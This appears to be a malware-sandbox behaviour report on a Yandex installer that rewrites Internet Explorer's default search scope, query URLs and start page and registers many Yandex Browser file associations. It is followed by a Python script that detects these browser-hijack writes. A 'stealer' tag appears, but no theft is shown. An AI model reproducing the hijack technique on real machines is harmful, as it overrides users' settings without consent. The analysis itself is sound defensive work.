Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\ShowSearchSuggestionsInAddressGlobal = "1" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\FaviconURLFallback = "https://www.ya.ru/favicon.ico" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\NTLogoURL = "http://downloader.yandex.net/banner/ntpagelogo/{language}/{scalelevel}.png" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSON = "https://suggest.yandex.ru/suggest-ff.cgi?uil=ru&part={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3F50EEE1-31AB-11EF-9891-EEF45767FDFF} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "425341573" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\URL = "https://yandex.ru/search/?win=651&clid=6035498-354&text={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\DisplayName = "Яндекс" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\SuggestionsURL_JSON = "https://suggest.yandex.ru/suggest-ff.cgi?uil=ru&part={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\Local\\MICROS~1\\INTERN~1\\Services\\YANDEX~1.ICO" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "https://yandex.ru/search/?win=651&clid=6035502-354&text={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\NTURL = "https://yandex.ru/search/?win=651&clid=6035502-354&text={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "https://www.ya.ru/favicon.ico" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\buffer\TopResultURLFallback = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IE11TR" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\FaviconURLFallback = "http://www.bing.com/favicon.ico" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://downloader.yandex.net/banner/ntpagelogo/{language}/{scalelevel}.png" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000eea70a7786efe43a7a30281857b4a130000000002000000000010660000000100002000000028fa4a42dcd4abcd6db431b037682cc2844e7c091e531450b3b95de1ae9fcd54000000000e8000000002000020000000259ee738312bb1601c2c5357c7be9a832277f41655c0ef4831d59db3f2fef79b200000004197207ac0288b8d337395781db3467b053b0548bf25142d4c722ae82496b5df400000001ed05618015792d2e076b3b9ad6844d648ef67e77dbbeb68b23836b8567801f70b11f35bcac57af6e9f2471616e05fad62e3c07c79b1eabc102f231605e5d50f C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\buffer\DisplayName = "Bing" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\YaCreationDate = "2024-56-23" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A

Modifies Internet Explorer start page

stealer
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "https://www.ya.ru/?win=651&clid=6035495-354" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
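The SearchScopes and Start Page rows above are the classic shape of a browser-settings hijack: a process running from %TEMP% (seederexe.exe) rewrites the default search scope, its query URLs and the start page, while the only writes from iexplore.exe itself are housekeeping keys. The script below is an added example (not the sandbox's own tooling and not code from the sample): it parses rows in the "Description Indicator Process Target" layout used in these tables and applies three rules, with the five sample rows copied verbatim from this report. The rule names and the set of URL-type value names are my own choices.

```python
"""Flag browser-hijack registry writes in sandbox behaviour rows (added example)."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Rows copied from this report: three writes by seederexe.exe, two by iexplore.exe.
REPORT_ROWS = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "https://www.ya.ru/?win=651&clid=6035495-354" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "https://yandex.ru/search/?win=651&clid=6035502-354&text={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A',
    r'Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A',
]

ROW_RE = re.compile(r"^(Set value \((\w+)\)|Key created|Key deleted) (.+)$")
IE_KEY = "\\software\\microsoft\\internet explorer\\"
# Value names under SearchScopes that carry a provider URL (assumed list, from the rows in this report).
SEARCH_URL_VALUES = {"url", "nturl", "suggestionsurl", "suggestionsurl_json", "topresulturl"}


def parse_row(row: str) -> Dict[str, Optional[str]]:
    """Split one report row into operation, value type, registry path, value and writing process."""
    row = row.strip()
    if row.endswith(" N/A"):            # trailing Target column, always N/A for registry rows
        row = row[:-4]
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f"unrecognised row: {row[:60]}")
    op, vtype, rest = m.group(1), m.group(2), m.group(3)
    # The process column starts at the last ' C:\'. Registry values in these rows are quoted
    # with doubled backslashes ("C:\\Users\\..."), so a bare ' C:\' only precedes the process path.
    idx = rest.rfind(" C:\\")
    if idx < 0:
        raise ValueError(f"no process path in row: {row[:60]}")
    process, target = rest[idx + 1:], rest[:idx]
    value: Optional[str] = None
    if op.startswith("Set value"):
        key, sep, val = target.partition(" = ")
        if sep:                          # some rows (e.g. SuggestionsURL) show no value at all
            target, value = key, val.strip('"')
    return {"op": op, "type": vtype, "path": target, "value": value, "process": process}


def findings(ev: Dict[str, Optional[str]]) -> List[Tuple[str, str, str]]:
    """Return (rule, detail, process) for each hijack indicator in one parsed row."""
    out: List[Tuple[str, str, str]] = []
    path, proc = (ev["path"] or "").lower(), (ev["process"] or "").lower()
    if not (ev["op"] or "").startswith("Set value") or IE_KEY not in path:
        return out
    from_ie = proc.endswith("\\internet explorer\\iexplore.exe")
    name = path.rsplit("\\", 1)[-1]
    if path.endswith("\\main\\start page") and not from_ie:
        out.append(("ie_start_page", ev["value"] or "", ev["process"] or ""))
    if "\\searchscopes\\" in path:
        if name == "defaultscope" and not from_ie:
            out.append(("ie_default_scope", ev["value"] or "", ev["process"] or ""))
        elif name in SEARCH_URL_VALUES and ev["value"]:
            host = urlsplit(ev["value"]).hostname or ""   # the provider host is what an analyst reviews
            out.append(("ie_search_url", host, ev["process"] or ""))
    return out


def scan(rows: List[str]) -> List[Tuple[str, str, str]]:
    """Run every rule over every row and collect the hits in row order."""
    hits: List[Tuple[str, str, str]] = []
    for row in rows:
        hits.extend(findings(parse_row(row)))
    return hits


if __name__ == "__main__":
    for rule, detail, process in scan(REPORT_ROWS):
        print(f"{rule:18} {detail:50} {process}")
```

Running it over the five rows yields exactly three hits, all attributed to seederexe.exe: the start page set to www.ya.ru, the default scope switched to {0633EE93-D776-472f-A0FF-E1416B8B2E3A}, and an NTURL pointing at yandex.ru; the two iexplore.exe rows produce nothing. The process-origin test (writer is not iexplore.exe) is what separates a hijack from the browser persisting its own settings.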

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\AppDataLow\Yandex C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow\Yandex C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow\Yandex\UICreated_SYSTEM = "1" C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexFB2.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,-123" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.shtml\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.tiff\shell\image_search C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexHTML.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexSVG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.crx\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.css\OpenWithProgids\YandexCSS.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexJPEG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexXML.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexXML.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.xml\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCSS.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,-124" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexPNG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.tif\shell\image_search\ = "Поиск по картинке" C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCRX.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexFB2.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexINFE.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.png\shell C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexGIF.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.infected\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.htm C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.webp\OpenWithProgids\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexFB2.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexXML.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\yabrowser C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.webp\shell\image_search\ = "Поиск по картинке" C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexTXT.ZPRIUFGQ5KQOETUJVA6LWFNAFA\ = "Yandex Browser TXT Document" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.bmp C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexBrowser.crx\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexBrowser.crx\shell\open\command C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexBrowser.crx\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexHTML.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexPNG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
